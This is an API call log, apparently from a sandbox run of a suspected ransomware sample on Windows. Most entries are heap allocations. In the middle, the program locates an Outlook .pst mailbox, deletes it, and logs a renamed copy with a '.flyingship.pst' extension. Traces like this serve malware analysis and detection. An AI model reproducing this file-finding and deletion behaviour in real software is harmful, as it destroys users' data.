returned 0x9bd4c8 [0176.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0176.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0176.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0176.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0176.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0176.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0176.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0176.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0176.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0176.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0176.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0176.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0176.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0176.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0176.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0176.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0176.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0176.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0176.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0176.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0176.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0176.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0176.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0176.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0176.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0176.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0176.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0176.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0176.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0176.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0176.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0176.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0176.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0176.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0176.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0176.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0176.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0176.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0176.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0176.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0176.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0176.416] FreeLibrary (hLibModule=0x75990000) returned 1 [0176.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0176.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0176.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0176.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0176.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0176.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0176.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0176.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0176.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0176.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0176.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0176.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0176.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0176.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0176.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0176.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0176.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0176.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0176.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0176.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0176.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0176.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0176.417] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0176.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0176.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0176.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0176.417] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0176.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0176.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0176.417] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0176.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0176.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0176.417] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0176.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0176.417] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0176.417] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0176.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0176.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0176.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0176.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0176.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0176.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0176.417] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0176.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0176.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0176.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0176.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0176.418] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0176.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0176.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0176.418] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0176.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd828 [0176.418] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd828, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0176.419] FreeLibrary (hLibModule=0x75990000) returned 1 [0176.419] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0176.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0176.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0176.419] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0176.419] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.419] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst", lpFilePart=0x0) returned 0x4c [0176.420] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0xe8063c0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 0x90ae18 [0176.420] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst")) returned 1 [0176.427] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0xe8063c0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 0 [0176.427] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0176.427] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.427] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0176.427] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0176.427] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0176.427] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0176.427] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="st", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0176.427] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pst", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0176.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pst", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0176.428] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0176.428] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0176.428] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0176.428] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0176.428] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0176.431] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.431] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0176.431] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.431] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0176.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0176.432] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0176.432] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x156e, lpOverlapped=0x0) returned 1 [0176.432] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0176.432] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x156e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.432] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0176.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0176.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0176.432] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.flyingship.pst\r\n", cchWideChar=90, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 90 [0176.432] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.flyingship.pst\r\n", cchWideChar=90, lpMultiByteStr=0x9a5d78, cbMultiByte=90, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.flyingship.pst\r\n", lpUsedDefaultChar=0x0) returned 90 [0176.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0176.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d10 [0176.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d78 | out: hHeap=0x8a0000) returned 1 [0176.433] WriteFile (in: hFile=0x138, lpBuffer=0x9a5d10*, nNumberOfBytesToWrite=0x59, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9a5d10*, lpNumberOfBytesWritten=0x87f43c*=0x59, lpOverlapped=0x0) returned 1 [0176.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d10 | out: hHeap=0x8a0000) returned 1 [0176.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0176.433] CloseHandle (hObject=0x138) returned 1 [0176.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0176.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0176.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0176.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0176.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0176.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0176.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0176.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0176.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0176.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0176.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0176.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0176.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0176.435] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0176.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0176.435] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0176.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0176.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0176.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0176.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0176.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0176.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9100 | out: hHeap=0x8a0000) returned 1 [0176.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0176.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0176.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0176.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0176.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0176.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0176.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0176.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0176.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0176.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0176.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0176.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0176.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0176.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0176.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0176.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0176.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0176.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0176.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0176.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0176.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0176.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0176.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0176.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0176.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0176.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0176.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0176.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0176.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0176.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0176.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0176.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 